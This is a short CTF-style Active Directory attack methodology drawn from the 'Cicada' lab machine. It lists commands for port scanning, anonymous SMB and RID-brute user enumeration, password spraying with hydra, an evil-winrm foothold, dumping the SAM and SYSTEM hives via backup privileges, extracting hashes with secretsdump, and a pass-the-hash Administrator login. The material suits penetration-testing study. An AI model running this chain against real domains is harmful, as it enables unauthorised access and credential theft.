Easy Box:

Here’s an enhanced AD exploitation methodology with commands for each step:

Methodology for AD Enumeration and Exploitation

1. Initial Reconnaissance and Scanning

  • Identify Open Ports: Use nmap to scan common AD ports.

    nmap $target --top-ports=1000 -sV -v -sC -Pn > nmap.out
  • Host Configuration: Update /etc/hosts with the target hostname if needed.

    echo "$target cicada.htb" | sudo tee -a /etc/hosts

2. SMB Enumeration and Credential Gathering

  • Anonymous SMB Access: Use smbclient to list available shares.

    smbclient -L //$target -N
  • User Enumeration with RID Brute-forcing:

    nxc smb $target -u 'anonymous' -p '' --rid-brute 3000
  • SMB Information Gathering:

    enum4linux-ng -A $target

3. Password Discovery and Validation

  • Testing Credentials: Use tools like hydra or crackmapexec to test passwords.

    hydra -L usernames.txt -p $password smb://$target
  • Access Restricted Shares with Discovered Credentials:

    smbclient //$target/DEV -U 'username' -p 'password'

4. Initial Foothold

  • Remote Access: Use evil-winrm to log in with valid credentials.
    evil-winrm -i $target -u 'username' -p 'password'

5. Privilege Escalation

  • Identify Special Privileges:

    whoami /all
  • Backup Privileges: Use reg to save critical files to accessible locations.

    reg save hklm\sam c:\Temp\sam
    reg save hklm\system c:\Temp\system

6. Extract and Use Password Hashes

  • Download SAM and SYSTEM Files:

    download c:\Temp\sam
    download c:\Temp\system
  • Dump Password Hashes:

python3 secretsdump.py -sam sam -system system LOCAL > hashes.txt
  • Root Access: Use evil-winrm with Administrator hash.
evil-winrm -i $target -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:hash'

This methodical approach covers enumeration, initial access, and privilege escalation for AD exploitation for an easy box. Took from Cicada machine.

  1. Medium Cicada machine Walkthrough
  2. Sickboy github AD Cheat sheet